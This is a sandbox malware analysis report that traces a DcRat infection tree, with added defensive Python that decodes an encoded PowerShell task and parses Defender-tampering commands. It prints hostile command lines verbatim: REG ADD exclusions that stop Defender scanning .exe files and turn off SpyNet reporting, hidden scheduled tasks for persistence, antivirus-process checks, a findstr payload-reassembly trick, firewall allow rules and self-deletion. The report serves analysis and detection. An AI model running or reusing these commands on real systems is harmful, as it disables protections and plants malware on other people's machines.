- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"C:\Users\Admin\AppData\Local\Temp\4CBGCHM82DE58EB.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"C:\Users\Admin\AppData\Local\Temp\K94I82H7GA442K5.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Windows\Temp\xsv.exe6⤵
-
C:\Windows\Temp\xsv.exeC:\Windows\Temp\xsv.exe7⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"C:\Users\Admin\AppData\Local\Temp\0JE7G3LK557H5E8.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\0QEt.CpL",8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\368C0412AGB029I.exehttps://iplogger.org/1DLDa74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"C:\Users\Admin\Documents\ybRTF_ZrBzghRmdqS2tL_QaU.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"C:\Users\Admin\Pictures\Adobe Films\aICl8GfONwp8nKT_VlnQ1Edr.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"C:\Users\Admin\Pictures\Adobe Films\IqRZ5EVEdrzfFjHTHidxBAdw.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"C:\Users\Admin\Pictures\Adobe Films\qOxMIfZDfCKOLU4NJPxsAIR6.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"C:\Users\Admin\Pictures\Adobe Films\I8dJ1qS1rcI5yzla9SoRu01p.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"C:\Users\Admin\Pictures\Adobe Films\YisnVpUhrZ2PWS7ZEq2F4LK4.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSE3D3.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zSFC4D.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gAoSMREFD" /SC once /ST 02:13:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gAoSMREFD"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfPiLOEoMHGtOUUyTU" /SC once /ST 07:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\daUkIim.exe\" HU /site_id 525403 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
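The Install.exe /S /site_id "525403" subtree above launches cmd.exe indirectly through forfiles (/p c:\windows\system32 /m cmd.exe /c runs the quoted command once for the matching file, a common LOLBin indirection), and each cmd runs two REG ADD commands joined with cmd's &, one per registry view (/reg:32 and /reg:64). Both keys sit under the Windows Defender policy hive: Exclusions\Extensions with value name exe excludes every .exe from scanning, and Spynet\SpyNetReporting = 0 turns off cloud (MAPS) reporting. The "gAoSMREFD" task then runs PowerShell with -EncodedCommand, which is base64 of UTF-16LE text. The Python below is an added example, not code from the report or from any tool it names: it decodes that argument and parses the REG ADD chains, taking the command lines quoted from the tree as input. The tokenizer and the rule names are this example's own.

```python
import base64
import re

# Command line of the schtasks /CREATE "gAoSMREFD" process above.
SCHTASKS_CMD = 'schtasks /CREATE /TN "gAoSMREFD" /SC once /ST 02:13:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="'

# The two cmd.exe /C command lines spawned via forfiles above; "&" joins one REG ADD per registry view.
REG_CHAINS = [
    r'/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&',
    r'/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&',
]

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive) for the same parameter.
ENCODED_FLAG = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None if absent."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def win_split(cmd: str):
    """Split a command line the way cmd.exe tools see it: whitespace separates, double quotes
    group, backslashes are literal (shlex's POSIX rules would eat the backslashes in registry paths)."""
    args, cur, in_quotes = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_reg_add_chain(cmdline: str):
    """Parse every REG ADD in a cmd.exe line joined with '&'. Splitting on '&' before tokenizing
    is only safe because no quoted argument in these lines contains one (see note below)."""
    ops = []
    for segment in cmdline.split("&"):
        args = win_split(segment)
        while args and args[0].lower() not in ("reg", "reg.exe"):   # skip a leading "/C", "cmd", ...
            args.pop(0)
        if len(args) < 3 or args[1].lower() != "add":
            continue
        op = {"key": args[2], "value": None, "type": None, "data": None, "view": None, "force": False}
        i = 3
        while i < len(args):
            flag = args[i].lower()
            if flag in ("/v", "/t", "/d") and i + 1 < len(args):
                op[{"/v": "value", "/t": "type", "/d": "data"}[flag]] = args[i + 1]
                i += 2
                continue
            if flag == "/f":
                op["force"] = True
            elif flag.startswith("/reg:"):
                op["view"] = int(flag[5:])
            i += 1
        ops.append(op)
    return ops


DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"


def is_defender_policy_tamper(op) -> bool:
    """True for any write under the Defender policy hive (exclusions, SpyNet/MAPS, protection switches)."""
    return op["key"].lower().startswith(DEFENDER_POLICY)


def triage(cmdlines):
    """Run both checks over a list of command lines; returns (finding, detail) pairs."""
    findings = []
    for c in cmdlines:
        script = decode_encoded_command(c)
        if script:
            findings.append(("encoded_powershell", script))
        for op in parse_reg_add_chain(c):
            if is_defender_policy_tamper(op):
                findings.append(("defender_policy_write",
                                 f'{op["key"]}\\{op["value"]}={op["data"]} (view {op["view"]})'))
    return findings


if __name__ == "__main__":
    for kind, detail in triage([SCHTASKS_CMD] + REG_CHAINS):
        print(f"{kind}: {detail}")
```

The decoded command is start-process -WindowStyle Hidden gpupdate.exe /force: the installer forces a Group Policy refresh so the policy values it just wrote take effect without waiting for the next refresh cycle. The split on & is a shortcut that holds for these lines only; a general parser has to honour quoting before it looks for separators.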
C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"C:\Users\Admin\Pictures\Adobe Films\ktN6_OKyWBLIic4tRrS6Y7lW.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s .\7a69o.PlG5⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"C:\Users\Admin\Pictures\Adobe Films\2Se_pjJglnDpbeqjf2ldznTA.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy /?5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Organisations.jpg & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^rCLEJGCiZAx$" Member.jpg7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifRespect.exe.pif z7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pifC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Respect.exe.pif Films\2Se_pjJglnDpbeqjf2ldznTA.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 57⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
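The 2Se_pjJglnDpbeqjf2ldznTA.exe subtree above is a batch dropper: cmd < Organisations.jpg reads its script from a file with an image extension, tasklist piped into find checks for the Avast and AVG user interfaces, findstr /V /R "^rCLEJGCiZAx$" Member.jpg prints every line of Member.jpg except those consisting exactly of that marker, and ping -n 5 localhost is a sleep. The report does not show where findstr's output is redirected, so treating the filtered Member.jpg as the next stage that ends up as Respect.exe.pif is an inference. The Python below is an added example, not the dropper's code: it builds a constructed carrier file with marker lines interleaved (the layout is an assumption) and recovers the payload with the same filter findstr /V /R applies.

```python
import re

MARKER = "rCLEJGCiZAx"   # literal from the findstr /V /R "^rCLEJGCiZAx$" Member.jpg line above

# Constructed stand-in for whatever Member.jpg really carried (the report does not show it):
# base64-looking chunks plus two lines that contain the marker without being only the marker.
PAYLOAD = [
    "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
    "rCLEJGCiZAxX",
    "MDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1A=",
    "xxrCLEJGCiZAx",
    "YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5emFiY2RlZmdoaWo=",
]


def build_carrier(payload_lines, marker, every=2):
    """Constructed carrier layout (an assumption): one marker line after every `every` payload
    lines, CRLF line endings as a Windows tool would write them."""
    out = []
    for i, line in enumerate(payload_lines, 1):
        out.append(line)
        if i % every == 0:
            out.append(marker)
    return "\r\n".join(out) + "\r\n"


def findstr_v_r(text, pattern):
    """findstr /V /R: emit the lines that do NOT match `pattern`. findstr tests each line on its own
    and binds ^ and $ to the line, so re.search per line reproduces it for this pattern."""
    rx = re.compile(pattern)
    kept = [line for line in text.splitlines() if not rx.search(line)]
    return "".join(line + "\r\n" for line in kept)


def recover_payload(carrier, marker):
    """The dropper's step: drop lines that are exactly the marker, keep everything else in order."""
    return findstr_v_r(carrier, "^" + re.escape(marker) + "$")


if __name__ == "__main__":
    carrier = build_carrier(PAYLOAD, MARKER)
    print(carrier.splitlines().count(MARKER), "marker lines in carrier")
    print(recover_payload(carrier, MARKER))
```

Lines that merely contain the marker survive the filter because ^ and $ anchor the match to the whole line; that is what makes a short marker a safe separator inside otherwise arbitrary text, and why a detection should key on the findstr /V /R "^...$" shape rather than on the marker string itself.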
C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"C:\Users\Admin\Pictures\Adobe Films\noX74RWvzcp4L6vaQgCqmGgG.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe"C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp"C:\Users\Admin\AppData\Local\Temp\is-07OLF.tmp\36tK0gCUVT2orDhALS0_tIKC.tmp" /SL5="$2034E,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\36tK0gCUVT2orDhALS0_tIKC.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4b401a7f1663313283 --downloadDate=2022-09-16T07:27:55 --distId=marketator --pid=7476⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\ed94798b-0b18-4a72-3fdd-58f12738b754.run\__sentry-breadcrumb2" --initial-client-data=0x4a0,0x4a4,0x4a8,0x468,0x4ac,0x7ff6a3e4bc80,0x7ff6a3e4bca0,0x7ff6a3e4bcb87⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-2H5V6.tmp\AdblockInstaller.tmp" /SL5="$701FE,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-9cd486d4-c926-473e-8d7b-83211190e1d9\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"C:\Users\Admin\Pictures\Adobe Films\XqFLMvUeBEg_P943krgYtWkU.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 51484 -s 4245⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"C:\Users\Admin\Pictures\Adobe Films\5PzEorzxArsuyso_tUF64BQZ.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 4605⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 7845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8205⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 8285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 9845⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 10165⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 13765⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\nvNlamGS3lVvMXNb9dzkJmr7.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nvNlamGS3lVvMXNb9dzkJmr7.exe" /f6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 51464 -s 14125⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"C:\Users\Admin\Pictures\Adobe Films\N_fBXPZTfeRGqijnkDa5J2Jc.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 8483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 7963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 11363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 13803⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f & erase "C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "m7tpR8y__P6zIjNc638scLmV.exe" /f4⤵
- Kills process with taskkill
-
